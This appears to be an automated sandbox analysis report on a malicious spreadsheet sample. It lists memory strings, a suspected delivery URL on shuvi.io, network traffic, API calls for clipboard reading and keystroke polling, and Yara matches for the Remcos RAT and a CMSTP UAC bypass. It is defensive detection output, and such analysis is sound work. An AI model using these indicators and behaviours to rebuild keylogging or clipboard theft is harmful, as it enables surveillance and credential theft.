Source: bhv35FF.tmp.13.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
Source: svchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: svchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.464109574.0000000001D79000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: svchost.exe, 0000000F.00000002.463895380.00000000001DC000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.com/S
Source: svchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: svchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://www.msn.com/
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://www.msn.com/advertisement.ad.js
Source: bhv35FF.tmp.13.dr String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: svchost.exe, 0000000D.00000002.467921215.0000000000184000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.netXB
Source: bhv35FF.tmp.13.dr String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: bhv35FF.tmp.13.dr String found in binary or memory: https://contextual.media.net/
Source: bhv35FF.tmp.13.dr String found in binary or memory: https://contextual.media.net/8/nrrV73987.js
Source: bhv35FF.tmp.13.dr String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
Source: bhv35FF.tmp.13.dr String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: bhv35FF.tmp.13.dr String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: bhv35FF.tmp.13.dr String found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
Source: bhv35FF.tmp.13.dr String found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
Source: bhv35FF.tmp.13.dr String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
Source: bhv35FF.tmp.13.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv35FF.tmp.13.dr String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: bhv35FF.tmp.13.dr String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: bhv35FF.tmp.13.dr String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
Source: shuvi.io.url.4.dr String found in binary or memory: https://shuvi.io/
Source: PO-00006799868.xls, 7al0eY.url.4.dr String found in binary or memory: https://shuvi.io/7al0eY
Source: 68730000.0.dr, ~DFF2F9DC4D2772FBCE.TMP.0.dr String found in binary or memory: https://shuvi.io/7al0eYyX
Source: bhv35FF.tmp.13.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
Source: svchost.exe, 0000000D.00000003.467821156.0000000000525000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/
Source: svchost.exe, 0000000D.00000003.467821156.0000000000525000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_fl
Source: svchost.exe, 0000000D.00000003.467652223.0000000000525000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: bhv35FF.tmp.13.dr String found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
Source: svchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: bhv35FF.tmp.13.dr String found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
Source: unknown Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49161
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_0022407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 10_2_0022407C
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_0022427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 10_2_0022427A
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012D427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 11_2_012D427A
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_0022407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 10_2_0022407C
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_0021003A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 10_2_0021003A
Potential key logger detected (key state polling based)
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_0023CB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 10_2_0023CB26
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012ECB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 11_2_012ECB26
Yara detected Keylogger Generic
Source: Yara match File source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: name.exe PID: 3328, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: name.exe PID: 3000, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 2176, type: MEMORYSTR

E-Banking Fraud
barindex
Yara detected Remcos RAT
Source: Yara match File source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.485970456.0000000000604000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: name.exe PID: 3328, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: name.exe PID: 3000, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 2176, type: MEMORYSTR

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
